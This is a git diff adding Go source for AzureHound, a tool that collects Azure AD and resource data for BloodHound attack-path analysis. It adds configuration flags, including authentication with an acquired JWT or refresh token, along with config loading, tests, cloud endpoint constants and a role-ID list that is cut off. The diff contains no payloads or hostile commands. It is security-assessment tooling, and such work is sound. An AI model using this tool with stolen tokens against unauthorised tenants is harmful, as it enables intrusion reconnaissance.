+ return []string{"/etc/xdg"} + } + case "windows": + return []string{os.Getenv("PROGRAMDATA")} + default: + panic("unsupported operating system") + } + }() + + configDirs := []string{} + for _, dir := range prefixes { + path := filepath.Join(dir, "azurehound") + configDirs = append(configDirs, path) + } + return configDirs +} + +const EnvPrefix string = "AZUREHOUND" + +var AzRegions = []string{ + constants.China, + constants.Cloud, + constants.Germany, + constants.USGovL4, + constants.USGovL5, +} + +var ( + // Global Configurations + ConfigFile = Config{ + Name: "config", + Shorthand: "c", + Usage: fmt.Sprintf("AzureHound configuration file (default: %s)", DefaultConfigFile), + Persistent: true, + Default: DefaultConfigFile, + } + VerbosityLevel = Config{ + Name: "verbosity", + Shorthand: "v", + Usage: fmt.Sprintf("AzureHound verbosity level (defaults to %d) [Min: %d, Max: %d]", 0, -1, 2), + Persistent: true, + Default: 0, + } + JsonLogs = Config{ + Name: "json", + Shorthand: "", + Usage: "Output logs as json", + Persistent: true, + Default: false, + } + JWT = Config{ + Name: "jwt", + Shorthand: "j", + Usage: "Use an acquired JWT to authenticate into Azure", + Persistent: true, + Default: "", + } + LogFile = Config{ + Name: "log-file", + Shorthand: "", + Usage: "Output logs to this file", + Persistent: true, + Default: "", + } + Proxy = Config{ + Name: "proxy", + Shorthand: "", + Usage: "Sets the proxy URL for the AzureHound service", + Persistent: true, + Default: "", + } + RefreshToken = Config{ + Name: "refresh-token", + Shorthand: "r", + Usage: "Use an acquired refresh token to authenticate into Azure", + Persistent: true, + Default: "", + } + Pprof = Config{ + Name: "pprof", + Usage: "During graceful shutdown, prints the pprof profile with the provided name to stderr", + Persistent: true, + Default: "", + } + + // Azure Configurations + AzAppId = Config{ + Name: "app", + Shorthand: "a", + Usage: "The Application Id that the Azure app registration portal assigned when the app was registered.", + Persistent: true, + Default: "", + } + AzSecret = Config{ + Name: "secret", + Shorthand: "s", + Usage: "The Application Secret that was generated for the app in the app registration portal.", + Persistent: true, + Default: "", + } + AzCert = Config{ + Name: "cert", + Shorthand: "", + Usage: "The path to the certificate uploaded to the app registration portal.", + Persistent: true, + Default: "", + } + AzKey = Config{ + Name: "key", + Shorthand: "k", + Usage: "The path to the key file for a certificate uploaded to the app registration portal.", + Persistent: true, + Default: "", + } + AzKeyPass = Config{ + Name: "keypass", + Shorthand: "", + Usage: "The passphrase to use in conjuction with --key ${key file}.", + Persistent: true, + Default: "", + } + AzRegion = Config{ + Name: "region", + Shorthand: "", + Usage: fmt.Sprintf("The region of the Azure Cloud deployment (defaults to '%s') [%s]", constants.Cloud, strings.Join(AzRegions, ", ")), + Persistent: true, + Default: constants.Cloud, + } + AzTenant = Config{ + Name: "tenant", + Shorthand: "t", + Usage: "The directory tenant that you want to request permission from. This can be in GUID or friendly name format.", + Required: true, + Persistent: true, + Default: "", + } + AzAuthUrl = Config{ + Name: "auth", + Shorthand: "", + Usage: "The Azure ActiveDirectory Authority URL.", + Persistent: true, + Default: "", + } + AzGraphUrl = Config{ + Name: "graph", + Shorthand: "", + Usage: "The Microsoft Graph URL.", + Persistent: true, + Default: "", + } + AzMgmtUrl = Config{ + Name: "mgmt", + Shorthand: "", + Usage: "The URL of the Azure Resource Manager.", + Persistent: true, + Default: "", + } + AzUsername = Config{ + Name: "username", + Shorthand: "u", + Usage: "The user principal name for the Azure Portal", + Persistent: true, + Default: "", + } + AzPassword = Config{ + Name: "password", + Shorthand: "p", + Usage: "The user's password for the Azure Portal", + Persistent: true, + Default: "", + } + AzSubId = Config{ + Name: "subscriptionId", + Shorthand: "b", + Usage: "The subscription ID to use as a filter.", + Persistent: true, + Default: []string{}, + } + AzMgmtGroupId = Config{ + Name: "mgmtGroupId", + Shorthand: "m", + Usage: "The management group ID to use as a filter.", + Persistent: true, + Default: []string{}, + } + + // BHE Configurations + BHEUrl = Config{ + Name: "instance", + Shorthand: "i", + Usage: "The BloodHound Enterprise instance URL.", + Persistent: true, + Required: true, + Default: "", + } + + BHEToken = Config{ + Name: "token", + Shorthand: "", + Usage: "The BloodHound Enterprise token.", + Persistent: true, + Required: true, + Default: "", + } + + BHETokenId = Config{ + Name: "tokenId", + Shorthand: "", + Usage: "The BloodHound Enterprise token ID.", + Persistent: true, + Required: true, + Default: "", + } + + ColBatchSize = Config{ + Name: "batchSize", + Shorthand: "", + Usage: "The number of resources to send in a single batch sent to the server.", + Persistent: true, + Required: false, + Default: 100, + MinValue: 1, + MaxValue: 256, + } + + ColMaxConnsPerHost = Config{ + Name: "maxConnsPerHost", + Shorthand: "", + Usage: "The maximum number of connections made during collection.", + Persistent: true, + Required: false, + Default: 20, + MinValue: 1, + MaxValue: 200, + } + + ColMaxIdleConnsPerHost = Config{ + Name: "maxIdleConnsPerHost", + Shorthand: "", + Usage: "The maximum number of idle connections allowed during collection.", + Persistent: true, + Required: false, + Default: 20, + MinValue: 1, + MaxValue: 200, + } + + ColStreamCount = Config{ + Name: "streamCount", + Shorthand: "", + Usage: "The number of threads to use when collecting various resources.", + Persistent: true, + Required: false, + Default: 25, + MinValue: 1, + MaxValue: 50, + } + + // Command specific configurations + KeyVaultAccessTypes = Config{ + Name: "access-types", + Shorthand: "", + Usage: fmt.Sprintf("Filter key vault policies by one or more access type. [%s]\n\tNote: may be used multiple times or values may be provided as comma-separated list\n", strings.Join(enums.KeyVaultAccessPolicies(), ", ")), + Persistent: true, + Default: []enums.KeyVaultAccessType{}, + } + + OutputFile = Config{ + Name: "output", + Shorthand: "o", + Usage: "The path to the file in which to output data", + Persistent: true, + Default: "", + } + + GlobalConfig = []Config{ + ConfigFile, + VerbosityLevel, + JsonLogs, + JWT, + LogFile, + Proxy, + RefreshToken, + Pprof, + } + + AzureConfig = []Config{ + AzAppId, + AzSecret, + AzCert, + AzKey, + AzKeyPass, + AzRegion, + AzTenant, + AzAuthUrl, + AzGraphUrl, + AzMgmtUrl, + AzUsername, + AzPassword, + AzSubId, + AzMgmtGroupId, + } + + BloodHoundEnterpriseConfig = []Config{ + BHEUrl, + BHETokenId, + BHEToken, + } + + CollectionConfig = []Config{ + ColBatchSize, + ColMaxConnsPerHost, + ColMaxIdleConnsPerHost, + ColStreamCount, + } +) + +func ConfigFileUsed() string { + return config.ConfigFileUsed() +} diff --git a/config/internal/config.go b/config/internal/config.go new file mode 100644 index 0000000..5cff72f --- /dev/null +++ b/config/internal/config.go @@ -0,0 +1,157 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package internal + +import ( + "fmt" + "os" + "path/filepath" + "reflect" + "strings" + + "github.com/spf13/cobra" + "github.com/spf13/pflag" + "github.com/spf13/viper" +) + +type Config struct { + Name string + Shorthand string + Usage string + Required bool + Persistent bool + Default interface{} + MinValue int + MaxValue int +} + +func (s Config) Value() interface{} { + switch reflect.ValueOf(s.Default).Kind() { + case reflect.Slice: + return viper.GetStringSlice(s.Name) + case reflect.Int: + return viper.GetInt(s.Name) + default: + return viper.Get(s.Name) + } +} + +func (s Config) Set(value interface{}) { + viper.Set(s.Name, value) +} + +type Options struct { + ConfigFile string + ConfigName string + ConfigType string + ConfigPaths []string + EnvPrefix string +} + +func Init(cmd *cobra.Command, configs []Config) { + for _, config := range configs { + viper.SetDefault(config.Name, config.Default) + if cmd != nil { + if config.Persistent { + setFlag(config, cmd.PersistentFlags(), cmd.MarkPersistentFlagRequired) + } else { + setFlag(config, cmd.LocalFlags(), cmd.MarkFlagRequired) + } + } + } +} + +func setFlag(config Config, flagSet *pflag.FlagSet, markRequired func(string) error) error { + switch config.Default.(type) { + case int: + flagSet.IntP(config.Name, config.Shorthand, 0, config.Usage) + case bool: + flagSet.BoolP(config.Name, config.Shorthand, false, config.Usage) + case []string: + flagSet.StringSliceP(config.Name, config.Shorthand, []string{}, config.Usage) + default: + flagSet.StringP(config.Name, config.Shorthand, "", config.Usage) + } + + if config.Required { + return markRequired(config.Name) + } else { + return nil + } +} + +func LoadValues(cmd *cobra.Command, options Options) { + if cmd != nil { + viper.BindPFlags(cmd.Flags()) + } + viper.SetEnvPrefix(options.EnvPrefix) + viper.SetEnvKeyReplacer(strings.NewReplacer("-", "_")) + viper.AutomaticEnv() + + if options.ConfigFile != "" { + // If set, ConfigFile gets the highest priority by prepending to ConfigPaths; ConfigPaths are searched + // in priority order from ConfigPaths[0] (highest priority) to ConfigPaths[len(ConfigPaths)-1] (lowest priority) + options.ConfigPaths = append([]string{filepath.Dir(options.ConfigFile)}, options.ConfigPaths...) + basename := filepath.Base(options.ConfigFile) + ext := filepath.Ext(basename) + if ext != "" { + options.ConfigType = ext[1:] + } + options.ConfigName = strings.TrimSuffix(basename, ext) + } + + setConfigSearchPaths(options.ConfigName, options.ConfigType, options.ConfigPaths) + + if err := viper.ReadInConfig(); err != nil { + switch err.(type) { + case viper.ConfigFileNotFoundError, *os.PathError: + fmt.Fprintf(os.Stderr, "No configuration file located at %s\n", options.ConfigFile) + default: + fmt.Fprintf(os.Stderr, "Unable to read config file: %s\n", err) + } + } + + if cmd != nil { + // Ensure all required values that actually have been set don't return an error. (See https://github.com/spf13/viper/issues/397) + cmd.Flags().VisitAll(func(flag *pflag.Flag) { + if viper.IsSet(flag.Name) && viper.Get(flag.Name) != nil { + switch reflect.ValueOf(viper.Get(flag.Name)).Kind() { + case reflect.Slice: + value := strings.Join(viper.GetStringSlice(flag.Name), ",") + cmd.Flags().Set(flag.Name, value) + default: + cmd.Flags().Set(flag.Name, fmt.Sprintf("%v", viper.Get(flag.Name))) + } + } + }) + } +} + +func setConfigSearchPaths(name string, extension string, paths []string) { + viper.SetConfigName(name) + if extension != "" { + viper.SetConfigType(extension) + } + for _, path := range paths { + viper.AddConfigPath(path) + } +} + +func ConfigFileUsed() string { + return viper.ConfigFileUsed() +} diff --git a/config/internal/config_test.go b/config/internal/config_test.go new file mode 100644 index 0000000..d19ba48 --- /dev/null +++ b/config/internal/config_test.go @@ -0,0 +1,99 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package internal + +import ( + "testing" + + "github.com/spf13/cobra" +) + +var ( + fooConfig = Config{ + Name: "foo", + Shorthand: "f", + Usage: "configure foo", + Default: "foo", + } + + barConfig = Config{ + Name: "bar", + Shorthand: "b", + Usage: "configure bar", + Default: 1, + } + + bazConfig = Config{ + Name: "baz", + Usage: "configure baz", + Persistent: true, + Required: true, + Default: false, + } + + cmd = cobra.Command{ + Use: "test", + Run: func(cmd *cobra.Command, args []string) {}, + } +) + +func init() { + Init(&cmd, []Config{fooConfig, barConfig, bazConfig}) +} + +func TestFooConfig(t *testing.T) { + cmd.Execute() + + if actual := fooConfig.Value(); actual != "foo" { + t.Errorf("got %s, want %s\n", actual, "foo") + } + + fooConfig.Set("bar") + + if actual := fooConfig.Value(); actual != "bar" { + t.Errorf("got %s, want %s\n", actual, "bar") + } +} + +func TestBarConfig(t *testing.T) { + cmd.Execute() + + if actual := barConfig.Value(); actual != barConfig.Default { + t.Errorf("got %v, want %v\n", actual, barConfig.Default) + } + + barConfig.Set(2) + + if actual := barConfig.Value(); actual != 2 { + t.Errorf("got %v, want %v\n", actual, 2) + } +} + +func TestBazConfig(t *testing.T) { + cmd.Execute() + + if actual := bazConfig.Value(); actual != bazConfig.Default { + t.Errorf("got %v, want %v\n", actual, bazConfig.Default) + } + + bazConfig.Set(true) + + if actual := bazConfig.Value(); actual != true { + t.Errorf("got %v, want %v\n", actual, true) + } +} diff --git a/config/utils.go b/config/utils.go new file mode 100644 index 0000000..a7c36a1 --- /dev/null +++ b/config/utils.go @@ -0,0 +1,88 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package config + +import ( + "fmt" + "net/url" + + client "github.com/bloodhoundad/azurehound/v2/client/config" + config "github.com/bloodhoundad/azurehound/v2/config/internal" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/go-logr/logr" +) + +var Init = config.Init +var LoadValues = config.LoadValues + +func SetAzureDefaults() { + if AzAuthUrl.Value() == "" { + region := AzRegion.Value().(string) + url := client.AuthorityUrl(region, constants.AzureCloud().ActiveDirectoryAuthority) + AzAuthUrl.Set(url) + } + + if AzGraphUrl.Value() == "" { + region := AzRegion.Value().(string) + url := client.GraphUrl(region, constants.AzureCloud().MicrosoftGraphUrl) + AzGraphUrl.Set(url) + } + + if AzMgmtUrl.Value() == "" { + region := AzRegion.Value().(string) + url := client.ResourceManagerUrl(region, constants.AzureCloud().ResourceManagerUrl) + AzMgmtUrl.Set(url) + } +} + +func CheckCollectionConfigSanity(log logr.Logger) { + useSaneIntValues(ColBatchSize, log) + useSaneIntValues(ColMaxConnsPerHost, log) + useSaneIntValues(ColMaxIdleConnsPerHost, log) + useSaneIntValues(ColStreamCount, log) +} + +func useSaneIntValues(c config.Config, log logr.Logger) { + val := c.Value().(int) + if val < c.MinValue { + log.V(1).Info(fmt.Sprintf("Provided value %d for config option %s is less than minimum value %d. Using default value %d.", val, c.Name, c.MinValue, c.Default)) + c.Set(c.Default) + } else if val > c.MaxValue { + log.V(1).Info(fmt.Sprintf("Provided value %d for config option %s is greater than maximum value %d. Using default value %d.", val, c.Name, c.MaxValue, c.Default)) + c.Set(c.Default) + } +} + +func ValidateURL(input string) error { + if parsedURL, err := url.Parse(input); err != nil { + return err + } else if parsedURL.Scheme == "" || parsedURL.Host == "" { + return fmt.Errorf("invalid URL") + } else { + return nil + } +} + +func Options() config.Options { + return config.Options{ + ConfigFile: ConfigFile.Value().(string), + ConfigName: "config", + ConfigPaths: SystemConfigDirs(), + EnvPrefix: EnvPrefix, + } +} diff --git a/config/utils_test.go b/config/utils_test.go new file mode 100644 index 0000000..9fafccc --- /dev/null +++ b/config/utils_test.go @@ -0,0 +1,75 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package config_test + +import ( + "testing" + + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/logger" +) + +func TestCheckCollectionConfigSanity(t *testing.T) { + config.JsonLogs.Set(true) + + if logr, err := logger.GetLogger(); err != nil { + t.Errorf("Error creating logger: %v", err) + } else { + log := *logr + config.CheckCollectionConfigSanity(log) + + if config.ColBatchSize.Value().(int) != config.ColBatchSize.Default { + t.Errorf("ColBatchSize did not have the default value of %d. Actual: %d", config.ColBatchSize.Default, config.ColBatchSize.Value()) + } + + if config.ColMaxConnsPerHost.Value().(int) != config.ColMaxConnsPerHost.Default { + t.Errorf("ColMaxConnsPerHost did not have the default value of %d. Actual: %d", config.ColMaxConnsPerHost.Default, config.ColMaxConnsPerHost.Value()) + } + + if config.ColMaxIdleConnsPerHost.Value().(int) != config.ColMaxIdleConnsPerHost.Default { + t.Errorf("ColMaxIdleConnsPerHost did not have the default value of %d. Actual: %d", config.ColMaxIdleConnsPerHost.Default, config.ColMaxIdleConnsPerHost.Value()) + } + + if config.ColStreamCount.Value().(int) != config.ColStreamCount.Default { + t.Errorf("ColStreamCount did not have the default value of %d. Actual: %d", config.ColStreamCount.Default, config.ColStreamCount.Value()) + } + } +} + +func TestCheckCollectionConfigSanityOutOfBounds(t *testing.T) { + config.JsonLogs.Set(true) + + if logr, err := logger.GetLogger(); err != nil { + t.Errorf("Error creating logger: %v", err) + } else { + log := *logr + + config.ColBatchSize.Set(9999) + config.ColMaxConnsPerHost.Set(-9999) + + config.CheckCollectionConfigSanity(log) + + if config.ColBatchSize.Value().(int) != config.ColBatchSize.Default { + t.Errorf("ColBatchSize should have reverted to the default value of %d. Actual: %d", config.ColBatchSize.Default, config.ColBatchSize.Value()) + } + + if config.ColMaxConnsPerHost.Value().(int) != config.ColMaxConnsPerHost.Default { + t.Errorf("ColMaxConnsPerHost should have reverted to the default value of %d. Actual: %d", config.ColMaxConnsPerHost.Default, config.ColMaxConnsPerHost.Value()) + } + } +} diff --git a/constants/environments.go b/constants/environments.go new file mode 100644 index 0000000..12395c3 --- /dev/null +++ b/constants/environments.go @@ -0,0 +1,71 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package constants + +// Azure deployment regions +const ( + China string = "china" + Cloud string = "cloud" + Germany string = "germany" + USGovL4 string = "usgovl4" + USGovL5 string = "usgovl5" +) + +type Environment struct { + ActiveDirectoryAuthority string + MicrosoftGraphUrl string + ResourceManagerUrl string +} + +func AzureCloud() Environment { + return Environment{ + "https://login.microsoftonline.com", + "https://graph.microsoft.com", + "https://management.azure.com", + } +} + +func AzureUSGovernment() Environment { + return Environment{ + "https://login.microsoftonline.us", + "https://graph.microsoft.us", + "https://management.usgovcloudapi.net", + } +} + +func AzureUSGovernmentL5() Environment { + env := AzureUSGovernment() + env.MicrosoftGraphUrl = "https://dod-graph.microsoft.us" + return env +} + +func AzureChina() Environment { + return Environment{ + "https://login.chinacloudapi.cn", + "https://microsoftgraph.chinacloudapi.cn", + "https://management.chinacloudapi.cn", + } +} + +func AzureGermany() Environment { + return Environment{ + "https://login.microsoftonline.de", + "https://graph.microsoft.de", + "https://management.microsoftazure.de", + } +} diff --git a/constants/misc.go b/constants/misc.go new file mode 100644 index 0000000..c90648d --- /dev/null +++ b/constants/misc.go @@ -0,0 +1,44 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package constants + +import "fmt" + +// AzureHound version +// This gets populated at build time when the command being run uses the following flag: +// -ldflags "-X github.com/bloodhoundad/azurehound/v2/constants.Version=`git describe --tags --exact-match 2> /dev/null || git rev-parse HEAD`" +var Version string = "v0.0.0" + +const ( + Name string = "azurehound" + DisplayName string = "AzureHound" + Description string = "The official tool for collecting Azure data for BloodHound and BloodHound Enterprise" + AuthorRef string = "Created by the BloodHound Enterprise team - https://bloodhoundenterprise.io" + AzPowerShellClientID string = "1950a258-227b-4e31-a9cf-717495945fc2" +) + +// Returns a properly formatted value for the User-Agent header +func UserAgent() string { + return fmt.Sprintf("%s/%s", Name, Version) +} + +// Azure Services +const ( + GraphApiBetaVersion string = "beta" + GraphApiVersion string = "v1.0" +) diff --git a/constants/roles.go b/constants/roles.go new file mode 100644 index 0000000..b7ad549 --- /dev/null +++ b/constants/roles.go @@ -0,0 +1,1370 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package constants + +// Azure AD built-in roles +// See https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference for more info. +const ( + // Can create and manage all aspects of app registrations and enterprise apps. + ApplicationAdministratorRoleID string = "9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3" + + // Can create application registrations independent of the 'Users can register applications' setting. + ApplicationDeveloperRoleID string = "cf1c38e5-3621-4004-a7cb-879624dced7c" + + // Can create attack payloads that an administrator can initiate later. + AttackPayloadAuthorRoleID string = "9c6df0f2-1e7c-4dc3-b195-66dfbd24aa8f" + + // Can create and manage all aspects of attack simulation campaigns. + AttackSimulationAdministratorRoleID string = "c430b396-e693-46cc-96f3-db01bf8bb62a" + + // Assign custom security attribute keys and values to supported Azure AD objects. + AttributeAssignmentAdministratorRoleID string = "58a13ea3-c632-46ae-9ee0-9c0d43cd7f3d" + + // Read custom security attribute keys and values for supported Azure AD objects. + AttributeAssignmentReaderRoleID string = "ffd52fa5-98dc-465c-991d-fc073eb59f8f" + + // Define and manage the definition of custom security attributes. + AttributeDefinitionAdministratorRoleID string = "8424c6f0-a189-499e-bbd0-26c1753c96d4" + + // Read the definition of custom security attributes. + AttributeDefinitionReaderRoleID string = "1d336d2c-4ae8-42ef-9711-b3604ce3fc2c" + + // Can access to view, set and reset authentication method information for any non-admin user. + AuthenticationAdministratorRoleID string = "c4e39bd9-1100-46d3-8c65-fb160da0071f" + + // Can create and manage the authentication methods policy, tenant-wide MFA settings, password protection policy, and verifiable credentials. + AuthenticationPolicyAdministratorRoleID string = "0526716b-113d-4c15-b2c8-68e3c22b9f80" + + // Users assigned to this role are added to the local administrators group on Azure AD-joined devices. + AzureADJoinedDeviceLocalAdministratorRoleID string = "9f06204d-73c1-4d4c-880a-6edb90606fd8" + + // Can manage Azure DevOps organization policy and settings. + AzureDevOpsAdministratorRoleID string = "e3973bdf-4987-49ae-837a-ba8e231c7286" + + // Can manage all aspects of the Azure Information Protection product. + AzureInformationProtectionAdministratorRoleID string = "7495fdc4-34c4-4d15-a289-98788ce399fd" + + // Can manage secrets for federation and encryption in the Identity Experience Framework (IEF). + B2CIEFKeysetAdministratorRoleID string = "aaf43236-0c0d-4d5f-883a-6955382ac081" + + // Can create and manage trust framework policies in the Identity Experience Framework (IEF). + B2CIEFPolicyAdministratorRoleID string = "3edaf663-341e-4475-9f94-5c398ef6c070" + + // Can perform common billing related tasks like updating payment information. + BillingAdministratorRoleID string = "b0f54661-2d74-4c50-afa3-1ec803f12efe" + + // Can manage all aspects of the Cloud App Security product. + CloudAppSecurityAdministratorRoleID string = "892c5842-a9a6-463a-8041-72aa08ca3cf6" + + // Can create and manage all aspects of app registrations and enterprise apps except App Proxy. + CloudApplicationAdministratorRoleID string = "158c047a-c907-4556-b7ef-446551a6b5f7" + + // Limited access to manage devices in Azure AD. + CloudDeviceAdministratorRoleID string = "7698a772-787b-4ac8-901f-60d6b08affd2" + + // Can read and manage compliance configuration and reports in Azure AD and Microsoft 365. + ComplianceAdministratorRoleID string = "17315797-102d-40b4-93e0-432062caca18" + + // Creates and manages compliance content. + ComplianceDataAdministratorRoleID string = "e6d1a23a-da11-4be4-9570-befc86d067a7" + + // Can manage Conditional Access capabilities. + ConditionalAccessAdministratorRoleID string = "b1be1c3e-b65d-4f19-8427-f6fa0d97feb9" + + // Can approve Microsoft support requests to access customer organizational data. + CustomerLockBoxAccessApproverRoleID string = "5c4f9dcd-47dc-4cf7-8c9a-9e4207cbfc91" + + // Can access and manage Desktop management tools and services. + DesktopAnalyticsAdministratorRoleID string = "38a96431-2bdf-4b4c-8b6e-5d3d8abac1a4" + + // Deprecated - Do Not Use. + DeviceJoinRoleID string = "9c094953-4995-41c8-84c8-3ebb9b32c93f" + + // Deprecated - Do Not Use. + DeviceManagersRoleID string = "2b499bcd-da44-4968-8aec-78e1674fa64d" + + // Deprecated - Do Not Use. + DeviceUsersRoleID string = "d405c6df-0af8-4e3b-95e4-4d06e542189e" + + // Can read basic directory information. Commonly used to grant directory read access to applications and guests. + DirectoryReadersRoleID string = "88d8e3e3-8f55-4a1e-953a-9b9898b8876b" + + // Only used by Azure AD Connect service. + DirectorySynchronizationAccountsRoleID string = "d29b2b05-8046-44ba-8758-1e26182fcf32" + + // Can read and write basic directory information. For granting access to applications, not intended for users. + DirectoryWritersRoleID string = "9360feb5-f418-4baa-8175-e2a00bac4301" + + // Can manage domain names in cloud and on-premises. + DomainNameAdministratorRoleID string = "8329153b-31d0-4727-b945-745eb3bc5f31" + + // Can manage all aspects of the Dynamics 365 product. + Dynamics365AdministratorRoleID string = "44367163-eba1-44c3-98af-f5787879f96a" + + // Manage all aspects of Microsoft Edge. + EdgeAdministratorRoleID string = "3f1acade-1e04-4fbc-9b69-f0302cd84aef" + + // Can manage all aspects of the Exchange product. + ExchangeAdministratorRoleID string = "29232cdf-9323-42fd-ade2-1d097af3e4de" + + // Can create or update Exchange Online recipients within the Exchange Online organization. + ExchangeRecipientAdministratorRoleID string = "31392ffb-586c-42d1-9346-e59415a2cc4e" + + // Can create and manage all aspects of user flows. + ExternalIDUserFlowAdministratorRoleID string = "6e591065-9bad-43ed-90f3-e9424366d2f0" + + // Can create and manage the attribute schema available to all user flows. + ExternalIDUserFlowAttributeAdministratorRoleID string = "0f971eea-41eb-4569-a71e-57bb8a3eff1e" + + // Can configure identity providers for use in direct federation. + ExternalIdentityProviderAdministratorRoleID string = "be2f45a1-457d-42af-a067-6ec1fa63bc45" + + // Can manage all aspects of Azure AD and Microsoft services that use Azure AD identities. + GlobalAdministratorRoleID string = "62e90394-69f5-4237-9190-012177145e10" + + // Can read everything that a Global Administrator can, but not update anything. + GlobalReaderRoleID string = "f2ef992c-3afb-46b9-b7cf-a126ee74c451" + + // Members of this role can create/manage groups, create/manage groups settings like naming and expiration policies, and view groups activity and audit reports. + GroupsAdministratorRoleID string = "fdd7a751-b60b-444a-984c-02652fe8fa1c" + + // Can invite guest users independent of the 'members can invite guests' setting. + GuestInviterRoleID string = "95e79109-95c0-4d8e-aee3-d01accf2d47b" + + // Default role for guest users. Can read a limited set of directory information. + GuestUserRoleID string = "10dae51f-b6af-4016-8d66-8c2a99b929b3" + + // Can reset passwords for non-administrators and Helpdesk Administrators. + HelpdeskAdministratorRoleID string = "729827e3-9c14-49f7-bb1b-9608f156bbb8" + + // Can manage AD to Azure AD cloud provisioning, Azure AD Connect, and federation settings. + HybridIdentityAdministratorRoleID string = "8ac3fc64-6eca-42ea-9e69-59f4c7b60eb2" + + // Manage access using Azure AD for identity governance scenarios. + IdentityGovernanceAdministratorRoleID string = "45d8d3c5-c802-45c6-b32a-1d70b5e1e86e" + + // Has administrative access in the Microsoft 365 Insights app. + InsightsAdministratorRoleID string = "eb1f4a8d-243a-41f0-9fbd-c7cdf6c5ef7c" + + // Access the analytical capabilities in Microsoft Viva Insights and run custom queries. + InsightsAnalystRoleID string = "25df335f-86eb-4119-b717-0ff02de207e9" + + // Can view and share dashboards and insights via the M365 Insights app. + InsightsBusinessLeaderRoleID string = "31e939ad-9672-4796-9c2e-873181342d2d" + + // Can manage all aspects of the Intune product. + IntuneAdministratorRoleID string = "3a2c62db-5318-420d-8d74-23affee5d9d5" + + // Can manage settings for Microsoft Kaizala. + KaizalaAdministratorRoleID string = "74ef975b-6605-40af-a5d2-b9539d836353" + + // Can configure knowledge, learning, and other intelligent features. + KnowledgeAdministratorRoleID string = "b5a8dcf3-09d5-43a9-a639-8e29ef291470" + + // Has access to topic management dashboard and can manage content. + KnowledgeManagerRoleID string = "744ec460-397e-42ad-a462-8b3f9747a02c" + + // Can manage product licenses on users and groups. + LicenseAdministratorRoleID string = "4d6ac14f-3453-41d0-bef9-a3e0c569773a" + + // Create and manage all aspects of workflows and tasks associated with Lifecycle Workflows in Azure AD. + LifecycleWorkflowsAdministratorRoleID string = "59d46f88-662b-457b-bceb-5c3809e5908f" + + // Can read security messages and updates in Office 365 Message Center only. + MessageCenterPrivacyReaderRoleID string = "ac16e43d-7b2d-40e0-ac05-243ff356ab5b" + + // Can read messages and updates for their organization in Office 365 Message Center only. + MessageCenterReaderRoleID string = "790c1fb9-7f7d-4f88-86a1-ef1f95c05c1b" + + // Can manage network locations and review enterprise network design insights for Microsoft 365 Software as a Service applications. + NetworkAdministratorRoleID string = "d37c8bed-0711-4417-ba38-b4abe66ce4c2" + + // Can manage Office apps cloud services, including policy and settings management, and manage the ability to select, unselect and publish 'what's new' feature content to end-user's devices. + OfficeAppsAdministratorRoleID string = "2b745bdf-0803-4d80-aa65-822c4493daac" + + // Do not use - not intended for general use. + 